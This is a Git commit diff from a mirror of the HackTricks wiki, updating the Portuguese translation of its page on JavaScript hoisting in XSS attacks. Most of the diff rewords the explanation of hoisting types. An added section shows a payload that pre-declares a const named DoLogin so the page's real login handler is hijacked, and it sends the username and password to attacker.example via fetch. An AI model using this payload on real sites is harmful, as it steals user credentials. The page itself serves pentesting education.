maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-web/xss-cross-site-scripting/js-hoisting

Browse Source
This commit is contained in:
Translator 2025-08-28 19:23:15 +00:00
parent a6275ac042
commit d76c2443d0
2 changed files with 303 additions and 226 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

491
src/pentesting-web/xss-cross-site-scripting/README.md
View File

File diff suppressed because it is too large Load Diff

38
src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
View File

@ -4,29 +4,29 @@
## Informações Básicas
Na linguagem JavaScript, um mecanismo conhecido como **Hoisting** é descrito onde declarações de variáveis, funções, classes ou imports são conceitualmente elevadas ao topo de seu escopo antes que o código seja executado. Esse processo é realizado automaticamente pelo motor JavaScript, que percorre o script em várias passagens.
Na linguagem JavaScript existe um mecanismo conhecido como **Hoisting** em que declarações de variáveis, funções, classes ou imports são conceitualmente elevadas ao topo do seu escopo antes da execução do código. Esse processo é realizado automaticamente pelo motor do JavaScript, que percorre o script em múltiplas passadas.
Durante a primeira passagem, o motor analisa o código para verificar erros de sintaxe e o transforma em uma árvore de sintaxe abstrata. Esta fase inclui hoisting, um processo onde certas declarações são movidas para o topo do contexto de execução. Se a fase de análise for bem-sucedida, indicando que não há erros de sintaxe, a execução do script prossegue.
Durante a primeira passagem, o motor analisa o código para verificar erros de sintaxe e o transforma em uma árvore de sintaxe abstrata. Essa fase inclui hoisting, um processo onde certas declarações são movidas para o topo do contexto de execução. Se a fase de parsing for bem-sucedida, indicando ausência de erros de sintaxe, a execução do script prossegue.
É crucial entender que:
1. O script deve estar livre de erros de sintaxe para que a execução ocorra. As regras de sintaxe devem ser estritamente seguidas.
2. A colocação do código dentro do script afeta a execução devido ao hoisting, embora o código executado possa diferir de sua representação textual.
1. O script deve estar livre de erros de sintaxe para que a execução ocorra. As regras de sintaxe devem ser rigorosamente respeitadas.
2. A colocação do código dentro do script afeta a execução devido ao hoisting, embora o código executado possa diferir da sua representação textual.
#### Tipos de Hoisting
Com base nas informações do MDN, existem quatro tipos distintos de hoisting em JavaScript:
1. **Value Hoisting**: Permite o uso do valor de uma variável dentro de seu escopo antes de sua linha de declaração.
2. **Declaration Hoisting**: Permite referenciar uma variável dentro de seu escopo antes de sua declaração sem causar um `ReferenceError`, mas o valor da variável será `undefined`.
3. Este tipo altera o comportamento dentro de seu escopo devido à declaração da variável antes de sua linha de declaração real.
1. **Value Hoisting**: Permite o uso do valor de uma variável dentro do seu escopo antes da linha de declaração.
2. **Declaration Hoisting**: Permite referenciar uma variável dentro do seu escopo antes da sua declaração sem causar um `ReferenceError`, mas o valor da variável será `undefined`.
3. Esse tipo altera o comportamento dentro do seu escopo porque a declaração da variável é considerada antes da sua linha real de declaração.
4. Os efeitos colaterais da declaração ocorrem antes que o restante do código que a contém seja avaliado.
Em detalhes, declarações de função exibem comportamento de hoisting do tipo 1. A palavra-chave `var` demonstra comportamento do tipo 2. Declarações lexicais, que incluem `let`, `const` e `class`, mostram comportamento do tipo 3. Por fim, declarações `import` são únicas na medida em que são hoisted com comportamentos tanto do tipo 1 quanto do tipo 4.
Em detalhe, declarações de função exibem o comportamento de hoisting do tipo 1. A `var` demonstra o comportamento do tipo 2. Declarações lexicais, que incluem `let`, `const` e `class`, mostram o comportamento do tipo 3. Por fim, declarações `import` são únicas por serem hoisted com os comportamentos de tipo 1 e tipo 4.
## Cenários
Portanto, se você tiver cenários onde pode **Injetar código JS após um objeto não declarado** ser usado, você poderia **corrigir a sintaxe** declarando-o (para que seu código seja executado em vez de gerar um erro):
Portanto, se você tiver cenários onde pode **Inject JS code after an undeclared object** is used, você poderia **fix the syntax** declarando-o (assim seu código será executado em vez de lançar um erro):
```javascript
// The function vulnerableFunction is not defined
vulnerableFunction('test', '<INJECTION>');
@ -127,11 +127,31 @@ alert(1) -
},
})
}
trigger()
```
### Antecipe declarações posteriores travando um nome com const
Se você puder executar antes que uma `function foo(){...}` de nível superior seja analisada, declarar uma vinculação léxica com o mesmo nome (por exemplo, `const foo = ...`) impedirá que a declaração de função posterior reatribua esse identificador. Isso pode ser abusado em RXSS para sequestrar manipuladores críticos definidos mais adiante na página:
```javascript
// Malicious code runs first (e.g., earlier inline <script>)
const DoLogin = () => {
const pwd = Trim(FormInput.InputPassword.value)
const user = Trim(FormInput.InputUtente.value)
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd))
}
// Later, the legitimate page tries to declare:
function DoLogin(){ /* ... */ } // cannot override the existing const binding
```
Notas
- Isto depende da ordem de execução e do escopo global (nível superior).
- Se seu payload for executado dentro de `eval()`, lembre-se de que `const/let` dentro de `eval` são com escopo de bloco e não vão criar ligações globais. Injete um novo elemento `<script>` com o código para estabelecer um `const` global verdadeiro.
## Referências
- [https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios](https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios)
- [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
- [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
- [From "Low-Impact" RXSS to Credential Stealer: A JS-in-JS Walkthrough](https://r3verii.github.io/bugbounty/2025/08/25/rxss-credential-stealer.html)
{{#include ../../banners/hacktricks-training.md}}